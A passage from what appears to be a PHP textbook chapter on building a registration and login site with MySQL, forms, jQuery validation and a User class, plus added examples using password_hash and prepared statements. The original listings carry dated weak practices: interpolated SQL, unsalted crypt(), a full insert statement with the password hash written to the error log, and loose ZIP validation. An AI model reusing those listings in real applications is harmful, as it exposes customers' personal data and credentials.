If you need to build a complex login application, this chapter is for you. Here, 
we tell you about some important features of these types of applications and 
then walk you through creating all the required elements: the user database, 
web forms to collect the information and log users in, and all the backend 
details that allow this type of application to run smoothly. 

Understanding a Members-Only Site

User login applications can be quite simple, such as an application in which
the administrator sets up a list of valid users. Anyone who tries to access
a protected file is prompted to enter a username and password, which is
checked against the list of valid users. On the other hand, a login application
can be much more complicated. It can allow the website visitor to register
for access, setting up his or her own account. The application might collect
information from the customers as they register. The application might
provide the capability for the users to manage their own accounts. The features
that a login application can provide are varied.

The basic function of the login application in this chapter is to allow
registered users to enter the website and to keep out users who haven’t
registered. Its second major function is to allow users to register, storing their
information in a database. To meet its basic functionality, the user login
application should do the following:

♦ Give customers a choice of whether to register for website access or to
log in to the website if they’re already registered.

♦ Display a registration form that allows new customers to type their
registration information. The information to be collected in the form is
discussed in the following section, “Creating the User Database.”

♦ Validate the information submitted in the form. Make sure the required
fields are not blank and the submitted information is in the correct
format.

♦ Store the validated information in the database.

♦ Display a login form that asks for the registered customer’s username
and password.

♦ Compare the username and password that’s entered with the
usernames and passwords in the database. If a match is found, send a web
page from the site to the customer. If no match is found, give the
customer the opportunity to try another login.

Aside from the capability to register and log in, a login application can get 
much more complex, giving the capability for an administrator to assign 
roles to certain accounts. For example, a user might be an administrator 
who can view and change details of other user accounts. Although that 
functionality is beyond the scope of this chapter, it’s another function for an 
authentication system. 



Creating the User Database 

The application design calls for a database that stores user information. The 
database is the core of this application. The database is needed to store the 
usernames and passwords of all users allowed to access the website. Often, 
the database is used to store much more information about the customer. 
This information can be used for marketing purposes. 

The login application in this chapter assumes that the users are customers 
who are willing to provide their names, addresses, and other information. 
This type of application is most appropriate for sites that sell products to 
customers. The user database is named Customer. 

Designing the Customer database

Your first design task is to select the information you want to store in the 
Customer database. At the very least, you need to store a username and a 
password that the user can use to log in. It’s also useful to know when the 
user account was created. In deciding which information to collect during 
the user registration, you need to balance your urge to collect all the potentially
useful information that you can think of against your users’ urges to
avoid forms that look too time-consuming and their reluctance to give out 
personal information. One compromise is to ask for some optional information. 
Users who don’t mind will enter it, and those who object can just leave it 
blank. You saw examples of this in Chapter 3 of this minibook, where only 
certain fields were required on the form. 

Some information is required for your website to perform its function. For
instance, users can readily see that a site that’s going to send them something
needs to collect a name and address. However, they might not see why 
you need a phone number. Even if you require it, users sometimes enter 
fake phone numbers. So, unless you have a captive audience, such as your 
employees, who must give you everything you ask for, think carefully about 
what information to collect. It’s easy for users to leave your website when 
irritated. It’s not like they drove miles to your store and looked for a parking 
space for hours. They can leave with just a click. 

For the sample application in this chapter, assume the website is an online
store that sells products. Thus, you need to collect the customer’s contact
information. You believe you need her phone number in case you need to
contact her about her order. Most customers are willing to provide phone
numbers to reputable online retailers, recognizing that orders can have 
problems that need to be discussed. The remainder of this section discusses 
the details of the information and its storage in a MySQL database. 

The database contains only one table. The customer information is stored 
in the table, one record (row) for each customer. The fields needed for the 
table are shown in Table 4-1. 

Table 4-1: Database Table: Customer

Variable Name   Type            Description
id              INT             Auto-incrementing primary key
email           VARCHAR(255)    E-mail address for the account. This will also be used as the username for login of the user account.
create_date     DATE            Date when account was added to table
password        VARCHAR(255)    Password for the account
last_name       VARCHAR(255)    Customer's last name
first_name      VARCHAR(255)    Customer's first name
street          VARCHAR(255)    Customer's street address
city            VARCHAR(255)    City where customer lives
state           CHAR(2)         Two-letter state code
zip             CHAR(10)        ZIP code; 5 numbers or ZIP + 4
phone           VARCHAR(25)     Phone number where customer can be reached
phone_type      VARCHAR(255)    Phone type (work or home)

The table has 12 fields. The first four fields, id, email, password, and
create_date, are required and cannot be blank. The remaining fields
contain information like the customer’s name, address, and phone, which are
allowed to be blank. The first field, id, is the primary key.
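
Table 4-1 gives the password column 255 characters, which is enough to hold a salted hash in place of the password itself. The following added example (not from the book) produces and checks that value with PHP's password_hash() and password_verify(), available since PHP 5.5. The function names and the sample row are hypothetical, and it assumes the login code verifies against the stored hash.

```php
<?php
// Added example, not from the book. make_password_hash() and check_login()
// are hypothetical names; the 'password' key follows Table 4-1.

// Build the value for Customer.password: a salted one-way hash.
function make_password_hash($plain) {
    if (!is_string($plain) || $plain === '') {
        throw new InvalidArgumentException("Password must be a non-empty string");
    }
    return password_hash($plain, PASSWORD_DEFAULT);
}

// $row: the Customer row selected by e-mail, or null when none matched.
// Returns array($ok, $newHash). $newHash is non-null when the stored hash
// was made with older settings and should be replaced after this login.
function check_login($row, $submitted) {
    static $dummy = null;
    if ($dummy === null) {
        // Verified against when the account is unknown, so a missing account
        // costs the same hashing work as a wrong password.
        $dummy = password_hash('constructed-placeholder', PASSWORD_DEFAULT);
    }
    $known  = is_array($row) && isset($row['password']);
    $stored = $known ? $row['password'] : $dummy;

    $verified = is_string($submitted) && password_verify($submitted, $stored);
    $ok = $known && $verified;

    $newHash = null;
    if ($ok && password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        $newHash = password_hash($submitted, PASSWORD_DEFAULT);
    }
    return array($ok, $newHash);
}

// Constructed row standing in for a record from the Customer table.
$row = array('email'    => 'test@example.com',
             'password' => make_password_hash('correct horse battery'));

print "stored length: " . strlen($row['password']) . " of 255\n";

// Constructed login attempts: the right password, a wrong one, an array.
$attempts = array('correct horse battery', 'wrong guess', array('x'));
foreach ($attempts as $attempt) {
    $result = check_login($row, $attempt);
    $label  = is_string($attempt) ? $attempt : 'non-string input';
    print $label . " => " . ($result[0] ? "login ok" : "login refused") . "\n";
}

// No row found for the submitted e-mail address.
$result = check_login(null, 'correct horse battery');
print "unknown account => " . ($result[0] ? "login ok" : "login refused") . "\n";
```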


Building the Customer database

You can create the MySQL database using any of the methods discussed in 
Book V, Chapter 3. The following SQL statement creates this database: 

CREATE DATABASE CustomerDirectory; 


The following SQL statement creates the table: 


CREATE TABLE Customer (
    id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
    email VARCHAR(255) NOT NULL,
    create_date DATETIME NOT NULL,
    password VARCHAR(255) NOT NULL,
    last_name VARCHAR(255),
    first_name VARCHAR(255),
    street VARCHAR(255),
    city VARCHAR(255),
    state CHAR(2),
    zip CHAR(10),
    phone VARCHAR(25),
    phone_type VARCHAR(255)
);


Accessing the Customer database 

PHP provides MySQL functions for accessing your database from your PHP 
script. The MySQL functions are passed the information needed to access 
the database, such as a MySQL account name and password. The MySQL 
account name and password are not related to any other account name or 
password that you have, such as a password to log in to the system. 

In this application, the information needed by the PHP mysqli functions is
stored in a separate file called dbstuff.inc. This file is stored in a directory
outside the web space, for security reasons. The file contains information
similar to the following:

<?php
define("DBHOST", "YOURHOST");
define("DBUSER", "YOURUSER");
define("DBPASS", "YOURPASSWORD");
define("DB", "CustomerDirectory");
?>



Notice the PHP tags at the beginning and the end of the file. If these tags are 
not included, the information might display on the web page for the whole 
world to see. Not what you want at all. 

For security reasons, this file is stored in a directory outside the web space.
You can set the include directory in your php.ini file. Include files are
explained in detail in Book IV, Chapter 2.



This database is intended to hold data entered by customers — not by you. 
It will be empty when the application is first made available to customers 
until customers add data. 

When you test your application scripts, the scripts will add a row to the 
database. You need to add a row with a username and password for your 
own use when testing the scripts. 


Creating Base Functions 

The first step in creating any large application is to create some base files 
that will be used to house generic functions. In Chapter 3 of this minibook, 
a file for validation is created. For this application, use that validation file 
along with a main functions file that will then require other files. 

This represents an important conceptual change from the forms used in
Chapter 3. The functions file will be responsible for starting sessions, setting
up any constants that you might need, and including other required files.
This saves you from having to remember what to include where and from
having to remember to start sessions everywhere.

Your basic functions file will be called functions.inc and will be placed in
the document root. Listing 4-1 shows that file.


Listing 4-1: A Basic Functions File 

<?php
//generic file for generic functions and other includes
session_start();

require_once("../dbstuff.inc");
require_once("validation.inc");
?>

As you can see from Listing 4-1, the session is started and two files are
required: the dbstuff.inc file that you saw in the preceding section and a
validation.inc file, shown in Listing 4-2.


Listing 4-2: The validation.inc File 

<?php

function is_valid_state($state) {
    $validStates = array("AL","CA","CO","FL","IL","NJ","NY","WI");
    if (in_array($state,$validStates)) {
        return true;
    } else {
        return false;
    }
} //end function is_valid_state

function is_valid_zip($zip) {
    // As written, any all-digit string passes the first test regardless of
    // length, and any 5- or 9-character string passes the second.
    if (preg_match('/^[\d]+$/',$zip)) {
        return true;
    } else if (strlen($zip) == 5 || strlen($zip) == 9) {
        return true;
    } else {
        return false;
    }
} //end function is_valid_zip

?>

This validation.inc file is similar to that used from Chapter 3. The main
change is to the array of valid states.

As you move through this chapter, other files will be added to the
functions.inc file and other functions may be added as you need them.

Creating the registration pages

The registration page borrows heavily from the form in Chapter 3. There are 
a couple additional fields, based on the data requirements for this application, 
and there’s a require_once at the top of the file to include your generic 
functions file. 

Listing 4-3 shows the code for the registration page, called register.php.


The pages involved in the application will use jQuery, along with an external
JavaScript and Cascading Style Sheet (CSS) file. This is essentially the same
pattern used in Chapter 3, and as you’ll see, the registration form looks
strikingly similar to that used in that chapter, too!


Listing 4-3: The Registration Page 

<?php require_once("functions.inc"); ?>
<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript" src="register.js"></script>
<link rel="stylesheet" type="text/css" href="form.css">
<title>A form</title>
</head>
<body>
<form id="userForm" method="POST" action="register-process.php">
<div>
    <fieldset>
    <legend>Registration Information</legend>
    <div id="errorDiv">
<?php
    if (isset($_SESSION['error']) && isset($_SESSION['formAttempt'])) {
        unset($_SESSION['formAttempt']);
        print "Errors encountered<br />\n";
        foreach ($_SESSION['error'] as $error) {
            print $error . "<br />\n";
        } //end foreach
    } //end if
?>
    </div>
    <label for="fname">First Name:* </label>
    <input type="text" id="fname" name="fname">
    <span class="errorFeedback errorSpan"
        id="fnameError">First Name is required</span>
    <br />
    <label for="lname">Last Name:* </label>
    <input type="text" id="lname" name="lname">
    <span class="errorFeedback errorSpan"
        id="lnameError">Last Name is required</span>
    <br />
    <label for="email">E-mail Address:* </label>
    <input type="text" id="email" name="email">
    <span class="errorFeedback errorSpan"
        id="emailError">E-mail is required</span>
    <br />
    <label for="password1">Password:* </label>
    <input type="password" id="password1" name="password1">
    <span class="errorFeedback errorSpan"
        id="password1Error">Password required</span>
    <br />
    <label for="password2">Verify Password:* </label>
    <input type="password" id="password2" name="password2">
    <span class="errorFeedback errorSpan"
        id="password2Error">Passwords don't match</span>
    <br />
    <label for="addr">Address: </label>
    <input type="text" id="addr" name="addr">
    <br />
    <label for="city">City: </label>
    <input type="text" id="city" name="city">
    <br />
    <label for="state">State: </label>
    <select name="state" id="state">
        <option></option>
        <option value="AL">Alabama</option>
        <option value="CA">California</option>
        <option value="CO">Colorado</option>
        <option value="FL">Florida</option>
        <option value="IL">Illinois</option>
        <option value="NJ">New Jersey</option>
        <option value="NY">New York</option>
        <option value="WI">Wisconsin</option>
    </select>
    <br />
    <label for="zip">ZIP: </label>
    <input type="text" id="zip" name="zip">
    <br />
    <label for="phone">Phone Number: </label>
    <input type="text" id="phone" name="phone">
    <span class="errorFeedback errorSpan"
        id="phoneError">Format: xxx-xxx-xxxx</span>
    <br />
    <br />
    <label for="work">Number Type:</label>
    <input class="radioButton" type="radio"
        name="phonetype" id="work" value="work">
    <label class="radioButton" for="work">Work</label>
    <input class="radioButton" type="radio"
        name="phonetype" id="home" value="home">
    <label class="radioButton" for="home">Home</label>
    <span class="errorFeedback errorSpan phoneTypeError"
        id="phonetypeError">Please choose an option</span>
    <br />
    <input type="submit" id="submit" name="submit">
    </fieldset>
</div>
</form>
</body>
</html>

When viewed in a browser, the page looks like that in Figure 4-1. 


Figure 4-1: The registration page layout.

The registration page uses nearly the same JavaScript and CSS as Chapter 3’s
form, too. The registration page’s HTML refers to them as register.js and
form.css, respectively. Listing 4-4 shows the JavaScript used for the
registration page.


Listing 4-4: Registration JavaScript 

$(document).ready(function() {

    $("#userForm").submit(function(e) {
        removeFeedback();
        var errors = validateForm();
        if (errors == "") {
            return true;
        } else {
            provideFeedback(errors);
            e.preventDefault();
            return false;
        }
    });

    function validateForm() {
        var errorFields = new Array();

        //Check required fields have something in them
        if ($('#lname').val() == "") {
            errorFields.push('lname');
        }
        if ($('#fname').val() == "") {
            errorFields.push('fname');
        }
        if ($('#email').val() == "") {
            errorFields.push('email');
        }
        if ($('#password1').val() == "") {
            errorFields.push('password1');
        }

        // Check passwords match
        if ($('#password2').val() != $('#password1').val()) {
            errorFields.push('password2');
        }

        //very basic e-mail check: a "." after the third character and an
        //"@" that is not the first character
        if (!($('#email').val().indexOf(".") > 2 &&
              $('#email').val().indexOf("@") > 0)) {
            errorFields.push('email');
        }

        if ($('#phone').val() != "") {
            var phoneNum = $('#phone').val();
            //replace() returns a new string, so keep the result
            phoneNum = phoneNum.replace(/[^0-9]/g, "");
            if (phoneNum.length != 10) {
                errorFields.push("phone");
            }
            if (!$('input[name=phonetype]:checked').val()) {
                errorFields.push("phonetype");
            }
        }

        return errorFields;
    } //end function validateForm

    function provideFeedback(incomingErrors) {
        for (var i = 0; i < incomingErrors.length; i++) {
            $("#" + incomingErrors[i]).addClass("errorClass");
            $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
        }
        $("#errorDiv").html("Errors encountered");
    }

    function removeFeedback() {
        $("#errorDiv").html("");
        $('input').each(function() {
            $(this).removeClass("errorClass");
        });
        $('.errorSpan').each(function() {
            $(this).addClass("errorFeedback");
        });
    }

});

Listing 4-5 shows the CSS used for the registration page. 


Listing 4-5: Registration Page CSS 


body {
    font-family: arial,helvetica;
}

form fieldset {
    display: inline-block;
}

.radioButton {
    float: none;
    display: inline;
    margin-right: 0.1em;
    width: 2em;
}

form label {
    width: 8em;
    margin-right: 1em;
    float: left;
    text-align: right;
    display: block;
}

form input {
    width: 15em;
}

#submit {
    margin-top: 2em;
    float: right;
}

.errorClass {
    background-color: #CC6666;
}

#errorDiv {
    color: red;
}

.errorFeedback {
    visibility: hidden;
}

.phoneTypeError {
    margin-left: 1.2em;
    padding: 0.1em;
    background-color: #CC6666;
}

Much of the work for a members-only site happens through objects, which 
you learn about in Book IV, Chapter 4. Later in this chapter, you create a 
user object. One area that doesn’t really call for the power and reusability 
of object-oriented code is in the registration. For example, you won’t need 
to call the registration function from multiple places and the functions used 
within it are very specific to registration. All these factors add up to being 
able to use a simple function for registration. 

The registration-process PHP page, which is called as the form action from the
register.php page (refer to Listing 4-3), includes much of the same error
handling that you see in Chapter 3’s example. In addition, the registration
function is also included on the page. Listing 4-6 shows the
register-process.php page.

Listing 4-6: The register-process Page

<?php
require_once('functions.inc');

//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: register.php"));
}

$_SESSION['formAttempt'] = true;

if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}

$_SESSION['error'] = array();

$required = array("lname","fname","email","password1","password2");

//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}

if (!preg_match('/^[\w .]+$/',$_POST['fname'])) {
    $_SESSION['error'][] = "First Name must be letters and numbers only.";
}

if (!preg_match('/^[\w .]+$/',$_POST['lname'])) {
    $_SESSION['error'][] = "Last Name must be letters and numbers only.";
}

if (isset($_POST['state']) && $_POST['state'] != "") {
    if (!is_valid_state($_POST['state'])) {
        $_SESSION['error'][] = "Please choose a valid state";
    }
}

if (isset($_POST['zip']) && $_POST['zip'] != "") {
    if (!is_valid_zip($_POST['zip'])) {
        $_SESSION['error'][] = "ZIP code error.";
    }
}

if (isset($_POST['phone']) && $_POST['phone'] != "") {
    if (!preg_match('/^[\d]+$/',$_POST['phone'])) {
        $_SESSION['error'][] = "Phone number should be digits only";
    } else if (strlen($_POST['phone']) < 10) {
        $_SESSION['error'][] = "Phone number must be at least 10 digits";
    }
    if (!isset($_POST['phonetype']) || $_POST['phonetype'] == "") {
        $_SESSION['error'][] = "Please choose a phone number type";
    } else {
        $validPhoneTypes = array("work","home");
        if (!in_array($_POST['phonetype'],$validPhoneTypes)) {
            $_SESSION['error'][] = "Please choose a valid phone number type.";
        }
    }
}

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) {
    $_SESSION['error'][] = "Invalid e-mail address";
}

if ($_POST['password1'] != $_POST['password2']) {
    $_SESSION['error'][] = "Passwords don't match";
}

//final disposition
if (count($_SESSION['error']) > 0) {
    die(header("Location: register.php"));
} else {
    if (registerUser($_POST)) {
        unset($_SESSION['formAttempt']);
        die(header("Location: success.php"));
    } else {
        error_log("Problem registering user: {$_POST['email']}");
        $_SESSION['error'][] = "Problem registering account";
        die(header("Location: register.php"));
    }
}

function registerUser($userData) {
    $mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB);
    if ($mysqli->connect_errno) {
        error_log("Cannot connect to MySQL: " . $mysqli->connect_error);
        return false;
    }

    $email = $mysqli->real_escape_string($_POST['email']);

    //check for an existing user
    $findUser = "SELECT id from Customer where email = '{$email}'";
    $findResult = $mysqli->query($findUser);
    $findRow = $findResult->fetch_assoc();
    if (isset($findRow['id']) && $findRow['id'] != "") {
        $_SESSION['error'][] = "A user with that e-mail address already exists";
        return false;
    }

    $lastName = $mysqli->real_escape_string($_POST['lname']);
    $firstName = $mysqli->real_escape_string($_POST['fname']);

    $cryptedPassword = crypt($_POST['password1']);
    $password = $mysqli->real_escape_string($cryptedPassword);

    if (isset($_POST['addr'])) {
        $street = $mysqli->real_escape_string($_POST['addr']);
    } else {
        $street = "";
    }

    if (isset($_POST['city'])) {
        $city = $mysqli->real_escape_string($_POST['city']);
    } else {
        $city = "";
    }

    if (isset($_POST['state'])) {
        $state = $mysqli->real_escape_string($_POST['state']);
    } else {
        $state = "";
    }

    if (isset($_POST['zip'])) {
        $zip = $mysqli->real_escape_string($_POST['zip']);
    } else {
        $zip = "";
    }

    if (isset($_POST['phone'])) {
        $phone = $mysqli->real_escape_string($_POST['phone']);
    } else {
        $phone = "";
    }

    if (isset($_POST['phonetype'])) {
        $phoneType = $mysqli->real_escape_string($_POST['phonetype']);
    } else {
        $phoneType = "";
    }

    $query = "INSERT INTO Customer (email,create_date,password,last_name,first_name,street,city,state,zip,phone,phone_type) " .
        " VALUES ('{$email}',NOW(),'{$password}','{$lastName}','{$firstName}'" .
        ",'{$street}','{$city}','{$state}','{$zip}','{$phone}','{$phoneType}')";

    if ($mysqli->query($query)) {
        $id = $mysqli->insert_id;
        error_log("Inserted {$email} as ID {$id}");
        return true;
    } else {
        // This writes the whole statement, including the customer's
        // details and password hash, to the error log.
        error_log("Problem inserting {$query}");
        return false;
    }
} //end function registerUser

?>


The registerUser function is called if no other errors are encountered. 
Therefore, by the time you get to the registerUser function, you already 
know that there’s a valid e-mail address, that the passwords match, and the 
required fields are all filled in. This means that the registerUser function 
can concentrate on its job: Get the user information entered into the database. 



The registerUser function first connects to the MySQL database by using
the constants defined in the dbstuff.inc file. Assuming the connection is
there, the e-mail address is escaped to make it safe to use in an SQL
statement. The e-mail address is then used to check if a user already exists
with that e-mail address. If one is found, then an error is set and Boolean
false is returned, which will trigger the error display.

The MySQL table is named Customer, with an uppercase C. If you attempt to
access it with a lowercase c, as in customer, the query will fail.

Assuming that an existing user isn’t found, each of the values to be inserted
into the database is then escaped using the mysqli_real_escape_string()
PHP function. The password is also encrypted (one-way hashed) using the
built-in PHP crypt() function.


An INSERT statement is built and executed against the database. If the
statement executes correctly, then the ID is retrieved; otherwise, an error is
generated.
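
The same duplicate check and insert written with mysqli prepared statements and password_hash(), as an added example that is not the book's code. It assumes PHP 5.5 or later, the Customer table from Table 4-1 and the dbstuff.inc constants; the function name registerUserPrepared and the $fields array are hypothetical. crypt() called without a salt, as in Listing 4-6, is no longer accepted as of PHP 8.0.

```php
<?php
// Added example, not from the book. Assumes the Customer table and the
// DBHOST, DBUSER, DBPASS and DB constants from dbstuff.inc.
// registerUserPrepared() and the $fields layout are hypothetical names;
// $fields uses the form field names from Listing 4-3.

function registerUserPrepared(mysqli $mysqli, array $fields) {
    // Optional columns default to an empty string, as in Listing 4-6.
    $defaults = array('addr' => '', 'city' => '', 'state' => '',
                      'zip' => '', 'phone' => '', 'phonetype' => '');
    $f = array_merge($defaults, $fields);

    // Check for an existing user. The value is sent separately from the
    // SQL text, so it needs no escaping and cannot change the statement.
    $find = $mysqli->prepare("SELECT id FROM Customer WHERE email = ?");
    if (!$find) {
        error_log("Prepare failed: " . $mysqli->error);
        return false;
    }
    $find->bind_param("s", $f['email']);
    $find->execute();
    $find->store_result();
    $exists = $find->num_rows > 0;
    $find->close();
    if ($exists) {
        return false;
    }
    // Table 4-1 defines no UNIQUE index on email, so this check-then-insert
    // is the only duplicate guard, as it is in the book's version.

    // password_hash() picks a random salt and records the algorithm and
    // cost inside the returned string; VARCHAR(255) is wide enough for it.
    $hash = password_hash($f['password1'], PASSWORD_DEFAULT);

    $insert = $mysqli->prepare(
        "INSERT INTO Customer (email, create_date, password, last_name, " .
        "first_name, street, city, state, zip, phone, phone_type) " .
        "VALUES (?, NOW(), ?, ?, ?, ?, ?, ?, ?, ?, ?)"
    );
    if (!$insert) {
        error_log("Prepare failed: " . $mysqli->error);
        return false;
    }
    // Ten placeholders, all bound as strings.
    $insert->bind_param("ssssssssss",
        $f['email'], $hash, $f['lname'], $f['fname'], $f['addr'],
        $f['city'], $f['state'], $f['zip'], $f['phone'], $f['phonetype']);
    $ok = $insert->execute();
    if (!$ok) {
        // Log the driver error only; the statement values (address,
        // phone, password hash) stay out of the log file.
        error_log("Insert failed: " . $insert->error);
    }
    $insert->close();
    return $ok;
}

// Usage inside register-process.php, after the validation has passed:
//   $mysqli = new mysqli(DBHOST, DBUSER, DBPASS, DB);
//   if (registerUserPrepared($mysqli, $_POST)) { ... }
```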

Building a success page

If registration is successful, the user is redirected to success.php. In the
example, success.php is going to be a really simple page, but you can
make the page as complex as you’d like.

Listing 4-7 shows the code for the success page. 


Listing 4-7: The Success Page 

<!doctype html>
<html>
<head>
<title>Registration Success</title>
</head>
<body>
<div>
    Thank you for registering
</div>
<div>
    <a href="login.php">Click here to login</a>
</div>
</body>
</html>

Now run through a registration using the code built so far. This procedure 
assumes that you’ve created the CustomerDirectory database and 
Customer table. 

Figure 4-2 shows the registration page with all the fields filled in correctly. 


Figure 4-2: Filling out the registration page.

Once filled in, clicking Submit Query sends the form to the
register-process.php page, which then registers the user and redirects to the
success page shown in Figure 4-3.

Figure 4-3: The success page.


At this point, there’s a database row created with the information from the 
registration form and the user is ready to log in. If only you had a login page! 

Creating the login page

Now that you have the capability to register a user, it’s time to create a page
related to logging in to the application. The login page will look like Figure 4-4.

Figure 4-4: The login page.

Listing 4-8 shows the code to build the login page.


Listing 4-8: The Code for the Login Page 

<?php require_once("functions.inc"); ?>
<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript" src="login.js"></script>
<link rel="stylesheet" type="text/css" href="form.css">
<title>Login</title>
</head>
<body>
<form id="loginForm" method="POST" action="login-process.php">
<div>
    <fieldset>
    <legend>Login</legend>
    <div id="errorDiv">
<?php
    if (isset($_SESSION['error']) && isset($_SESSION['formAttempt'])) {
        unset($_SESSION['formAttempt']);
        print "Errors encountered<br />\n";
        foreach ($_SESSION['error'] as $error) {
            print $error . "<br />\n";
        } //end foreach
    } //end if
?>
    </div>
    <label for="email">E-mail Address:* </label>
    <input type="text" id="email" name="email">
    <span class="errorFeedback errorSpan"
        id="emailError">E-mail is required</span>
    <br />
    <label for="password">Password:* </label>
    <input type="password" id="password" name="password">
    <span class="errorFeedback errorSpan"
        id="passwordError">Password required</span>
    <br />
    <input type="submit" id="submit" name="submit">
    </fieldset>
</div>
</form>
</body>
</html>

This code uses a JavaScript file called form.js, which is shown in Listing 4-9.


Listing 4-9: JavaScript for the Login Page 

$(document).ready(function() {

    $("#loginForm").submit(function(e) {
        removeFeedback();
        var errors = validateForm();
        if (errors == "") {
            return true;
        } else {
            provideFeedback(errors);
            e.preventDefault();
            return false;
        }
    });

    function validateForm() {
        var errorFields = new Array();

        //Check required fields have something in them
        if ($('#email').val() == "") {
            errorFields.push('email');
        }
        if ($('#password').val() == "") {
            errorFields.push('password');
        }

        //very basic e-mail check: a "." after the third character and an
        //"@" that is not the first character
        if (!($('#email').val().indexOf(".") > 2 &&
              $('#email').val().indexOf("@") > 0)) {
            errorFields.push('email');
        }

        return errorFields;
    } //end function validateForm

    function provideFeedback(incomingErrors) {
        for (var i = 0; i < incomingErrors.length; i++) {
            $("#" + incomingErrors[i]).addClass("errorClass");
            $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
        }
        $("#errorDiv").html("Errors encountered");
    }

    function removeFeedback() {
        $("#errorDiv").html("");
        $('input').each(function() {
            $(this).removeClass("errorClass");
        });
        $('.errorSpan').each(function() {
            $(this).addClass("errorFeedback");
        });
    }

});

The CSS used in this file is the same as is used for the registration page,
form.css (refer to Listing 4-5). Therefore, you don’t need to create a new
file for it. The action of the login form is login-process.php, which you
build in the next section.


Creating a User Object 

The basis for the authenticated portion of your customer’s site is the user — 
specifically, who they are and whether they’re logged in or not. To that end, 
a User object will provide a helpful abstraction layer, enabling you to add 
functionality later as you need it. 

Building the User class

The User class (it’s common to start classes with an uppercase letter in
PHP) will be stored in a file called ClassUser.php. That file will be included
in the functions.inc file with this line:

require_once("ClassUser.php");

Now the User class will be available everywhere that uses the functions.inc
file (which is pretty much everywhere in your application).

The User class is used to authenticate users and to set their information 
to and from sessions so that it can be used across multiple pages of the 
application. Listing 4-10 shows the code for the User class. 


Listing 4-10: The Code for the User Class

<?php

class User {
    public $id;
    public $email;
    public $firstName;
    public $lastName;
    public $address;
    public $city;
    public $state;
    public $zip;
    public $phone;
    public $phoneType;
    public $isLoggedIn = false;

    function __construct() {
        if (session_id() == "") {
            session_start();
        }
        if (isset($_SESSION['isLoggedIn']) && $_SESSION['isLoggedIn'] == true) {
            $this->_initUser();
        }
    } //end __construct

    public function authenticate($user,$pass) {
        $mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB);
        if ($mysqli->connect_errno) {
            error_log("Cannot connect to MySQL: " . $mysqli->connect_error);
            return false;
        }

        $safeUser = $mysqli->real_escape_string($user);
        // Hash the password exactly as submitted: registration hashed the
        // unescaped value, and the password never goes into the SQL text.
        $incomingPassword = $pass;
        $query = "SELECT * from Customer WHERE email = '{$safeUser}'";

        if (!$result = $mysqli->query($query)) {
            error_log("Cannot retrieve account for {$user}");
            return false;
        }

        // Will be only one row, so no while() loop needed
        $row = $result->fetch_assoc();
        $dbPassword = $row['password'];
        if (crypt($incomingPassword,$dbPassword) != $dbPassword) {
            error_log("Passwords for {$user} don't match");
            return false;
        }

        $this->id = $row['id'];
        $this->email = $row['email'];
        $this->firstName = $row['first_name'];
        $this->lastName = $row['last_name'];
        $this->address = $row['street'];
        $this->city = $row['city'];
        $this->zip = $row['zip'];
        $this->state = $row['state'];
        $this->phone = $row['phone'];
        $this->phoneType = $row['phone_type'];
        $this->isLoggedIn = true;

        $this->_setSession();

        return true;
    } //end function authenticate

    private function _setSession() {
        if (session_id() == '') {
            session_start();
        }

        $_SESSION['id'] = $this->id;
        $_SESSION['email'] = $this->email;
        $_SESSION['firstName'] = $this->firstName;
        $_SESSION['lastName'] = $this->lastName;
        $_SESSION['address'] = $this->address;
        $_SESSION['city'] = $this->city;
        $_SESSION['zip'] = $this->zip;
        $_SESSION['state'] = $this->state;
        $_SESSION['phone'] = $this->phone;
        $_SESSION['phoneType'] = $this->phoneType;
        $_SESSION['isLoggedIn'] = $this->isLoggedIn;
    } //end function setSession

    private function _initUser() {
        if (session_id() == '') {
            session_start();
        }

        $this->id = $_SESSION['id'];
        $this->email = $_SESSION['email'];
        $this->firstName = $_SESSION['firstName'];
        $this->lastName = $_SESSION['lastName'];
        $this->address = $_SESSION['address'];
        $this->city = $_SESSION['city'];
        $this->zip = $_SESSION['zip'];
        $this->state = $_SESSION['state'];
        $this->phone = $_SESSION['phone'];
        $this->phoneType = $_SESSION['phoneType'];
        $this->isLoggedIn = $_SESSION['isLoggedIn'];
    } //end function initUser

} //end class User

The constructor for the User class first checks to see if the session is
started (this will be a common theme for most of the functions in the class).
Granted, the session should be started already but if it’s not, you definitely
don’t want to be messing around with session-related variables. So if the
session isn’t already there, start it.

Next in the constructor, check to see if the user is logged in. If he is, run the
_initUser function. The _initUser function grabs the user’s information
from the session and sets each of the elements of their information as
properties.

The authenticate function is used to check the credentials entered on the
form against what’s in the database. A database connection is created and a
query is built using the e-mail address entered on the login form. If no user
is found with that e-mail address, an error is logged behind the scenes and
false is returned from the function.

Assuming that a user is found, her password is retrieved from the database.
The password will be encrypted (one-way hashed), just as you entered it when
the user registered. Therefore, the code needs to call the crypt() function
with both the incoming password from the login form and the password
retrieved from the database. If both encrypted versions match, then you know
the user is using the correct password.

With the user successfully authenticated, set the various details from the
database into properties and call the _setSession() function. The
_setSession() function takes the properties and sets them into the session so
that they can be used on other pages of the application.

That’s the User class, so far at least. You add to it as you need to later.
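
The credential check described above, written with a prepared statement, password_verify() and a fresh session ID at login, as an added example that is not the book's code. It assumes PHP 5.5 or later and the Customer table; authenticateUser() is a hypothetical stand-alone counterpart to User::authenticate().

```php
<?php
// Added example, not from the book. Assumes the Customer table and the
// dbstuff.inc constants. authenticateUser() is a hypothetical name; it
// returns true and fills the session on success, false otherwise.

function authenticateUser(mysqli $mysqli, $email, $password) {
    $stmt = $mysqli->prepare(
        "SELECT id, password, first_name FROM Customer WHERE email = ?");
    if (!$stmt) {
        error_log("Prepare failed: " . $mysqli->error);
        return false;
    }
    $stmt->bind_param("s", $email);
    $stmt->execute();
    $stmt->bind_result($id, $dbHash, $firstName);
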